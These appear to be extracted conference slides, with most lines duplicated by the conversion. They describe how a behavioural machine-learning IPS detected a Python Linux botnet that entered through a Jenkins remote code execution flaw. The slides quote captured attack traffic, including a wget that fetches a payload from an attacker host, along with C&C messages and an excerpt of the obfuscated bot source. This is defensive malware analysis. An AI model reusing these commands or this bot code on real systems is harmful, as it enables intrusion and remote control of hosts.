1

Robots againstRobots againstrobots: How arobots: How aMachine LearningMachine LearningIDS detected aIDS detected anovel Linux Botnetnovel Linux Botnet

Sebastian GarciaSebastian Garcia@eldracote@eldracote

sebastian.garcia@agents.fel.cvut.czsebastian.garcia@agents.fel.cvut.czhttps://stratosphereips.orghttps://stratosphereips.org

bit.ly/SS-RvRbit.ly/SS-RvR

2

The DetectionThe DetectionJanuary 18th, 2016.January 18th, 2016.

Testing Stratosphere IPS in the University network.Testing Stratosphere IPS in the University network.

Have an alert from a malicious behavior in the IDS.Have an alert from a malicious behavior in the IDS.

147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]:147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]:88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,

"For a long time there was a periodic connection (freq"For a long time there was a periodic connection (freq5s-60s), to an uncommon port, with large flows of5s-60s), to an uncommon port, with large flows ofmedium duration."medium duration."

3

The Analysis: VisibilityThe Analysis: Visibility

Argus flow suite from Qosient.Argus flow suite from Qosient.

Storage of 3,000 hosts continually (1 year ~= 80GB)Storage of 3,000 hosts continually (1 year ~= 80GB)

Back in time!Back in time!

4

The Detected ConnectionThe Detected ConnectionSent: "+.............P.43.249.81.135.......?."Sent: "+.............P.43.249.81.135.......?."Recv: ".................................." (MBs)Recv: ".................................." (MBs)

Recv once: "import time as O000OO0O0O00OO00O"Recv once: "import time as O000OO0O0O00OO00O"

43.249.81.13543.249.81.135No VirusTotal detection.No VirusTotal detection.AS58879 Shanghai Anchang Network SecurityAS58879 Shanghai Anchang Network SecurityTechnology Co.,L. China.Technology Co.,L. China.Last known domain: lyzqmir2.com. Minecraft server.Last known domain: lyzqmir2.com. Minecraft server.

5

The Begining: Jan 16th, 2016The Begining: Jan 16th, 2016103.242.134.118103.242.134.118 port port 3333333333/TCP /TCP [VT:7][VT:7]

S:"/bin/sh: 0: can't access tty; job control turned off.$,"S:"/bin/sh: 0: can't access tty; job control turned off.$,"

S:"S:"tomcat6tomcat6 17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep 17547 0.0 0.0 7944 868 ? S 13:36 0:00 grepabcc.$abcc.$

S:"wget 23.247.5.27:435/abcc.c"S:"wget 23.247.5.27:435/abcc.c"

R:"ps aux |grep abcc.ccd /tmp.m"R:"ps aux |grep abcc.ccd /tmp.m"

23.247.5.2723.247.5.27 port port 435435/TCP /TCP [VT:0][VT:0]23.247.5.2723.247.5.27 port port 2500025000/TCP (main CC)/TCP (main CC)

"=...-== Love AV ==-:..Linux 3.2.0-4-amd64""=...-== Love AV ==-:..Linux 3.2.0-4-amd64"

6

The AnalysisThe Analysis103.242.134.118103.242.134.118 port port 2303123031/TCP/TCP

""version:0.1"version:0.1"

"heartOK","hearta""heartOK","hearta"

"deployOK:115.239.248.88:80:3:60 heartOK""deployOK:115.239.248.88:80:3:60 heartOK"

103.242.134.118103.242.134.118 port port 3333333333/TCP/TCP

"http://222.179.116.23:8080/theme/1/pys.py""http://222.179.116.23:8080/theme/1/pys.py"

Python script?Python script?

7

Our computer Attacking?Our computer Attacking?

Hundreds of connections to IPs in China, port 80/UDP.Hundreds of connections to IPs in China, port 80/UDP.

115.239.248.88115.239.248.88 port port 8080//UDPUDP [MoveInternet Network [MoveInternet NetworkTechnology Co.,Ltd.,CN]Technology Co.,Ltd.,CN]

Few Kb of Few Kb of binarybinary data sent. data sent.

Could not find a motive or explanation.Could not find a motive or explanation.

8

The CompromiseThe CompromiseWhat we knewWhat we knew

Tomcat involved.Tomcat involved.Date range.Date range.

We found strange POSTs to Jenkins minutes beforeWe found strange POSTs to Jenkins minutes beforePOST /jenkins/descriptor/hudson.model.DownloadService/byId/POST /jenkins/descriptor/hudson.model.DownloadService/byId/

hudson.tasks.Maven.MavenInstaller/postBackhudson.tasks.Maven.MavenInstaller/postBack

POST /jenkins/ajaxExecutorsPOST /jenkins/ajaxExecutors

Remote Jenkins code execution vulnerability Remote Jenkins code execution vulnerability . Metasploit module.. Metasploit module.

CVE-CVE-2015-81032015-8103

9

The Python Botnet ScriptThe Python Botnet Scriptimport time as O000OO0O0O00OO00Oimport math as O000O0OO0O0O00O0Oimport socket as OO0000OOOOOO0O000import os as OO00000000OO000OOimport base64 as O0O0OOOO00O0O00OOimport threading as O00O000000OOO0OO0import random as O0OOO0O000OO0O00Oclass fbiabcd8c (O00O000000OOO0OO0 .Thread ): def __init__ (O0000O0OOOOOOO0O0 ): O00O000000OOO0OO0 .Thread .__init__ (O0000O0OOOOOOO0O0 ) def run (O0OO0OOOOO000O000 ): global SvneciA global fn023ca global fABRVUqfh if (fn023ca ==False ): return O00O0O00000OOO0OO =0 while fABRVUqfh : O00O0O00000OOO0OO +=1 if (SvneciA >=O00O0O00000OOO0OO ): O000OO0O0O00OO00O .sleep (1 ) else : break fABRVUqfh =False try : FcANECa .send (O0O0OOOO00O0O00OO .b64decode ("dWRwU3RvcHBlZA=="))

10

The Python Botnet ScriptThe Python Botnet ScriptObfuscated. Deobfuscated by Veronica Valeros. Thx! Obfuscated. Deobfuscated by Veronica Valeros. Thx!

Threads.Threads.

C&C channel with C&C channel with 10s timeouts.10s timeouts.

Receives orders and executes commands, includingReceives orders and executes commands, includingaccess to OS.access to OS.

Confuse analysts? or DDoS?Confuse analysts? or DDoS?

Function to send random UDP data to IPs receivedFunction to send random UDP data to IPs receivedby C&C.by C&C.

11

How Machine LearningHow Machine Learningdetected this?detected this?

12

Stratosphere IPSStratosphere IPS

https://stratosphereips.org/https://stratosphereips.org/

FreeFreeSoftwareSoftware

MachineMachineLearningLearning

BehavioralBehavioralIPSIPS

ProtectingProtectingNGOsNGOs

13

Stratosphere IPSStratosphere IPSModel network behaviors as a string of Model network behaviors as a string of lettersletters..

11 flow flow 33 features features 11 letter letter

14

Behavior of ConnectionsBehavior of Connections

15

Markov Chains ModelsMarkov Chains ModelsCreate, train and store a Markov Chain modelsCreate, train and store a Markov Chain models

16

Behavioral DetectionBehavioral Detection

TrainedTrainedMarkov ModelsMarkov Models

Similarity toSimilarity toUnknown TrafficUnknown Traffic

17

ConclusionConclusion

Still unknown and hidden.Still unknown and hidden.

Could Could notnot be detected by usual protections. be detected by usual protections.

No fingerprints, no No fingerprints, no reputationsreputations, no rootkits., no rootkits.

Continuous Continuous VisibilityVisibility is paramount. is paramount.

BehavioralBehavioral Machine Learning is improving. Machine Learning is improving.

18

Questions? And Thanks!Questions? And Thanks!

Sebastian GarciaSebastian Garcia

sebastian.garcia@agents.fel.cvut.czsebastian.garcia@agents.fel.cvut.cz

@eldracote@eldracote

Workshop Malware Traffic: Workshop Malware Traffic: bit.lybit.ly/SSdirtywork/SSdirtywork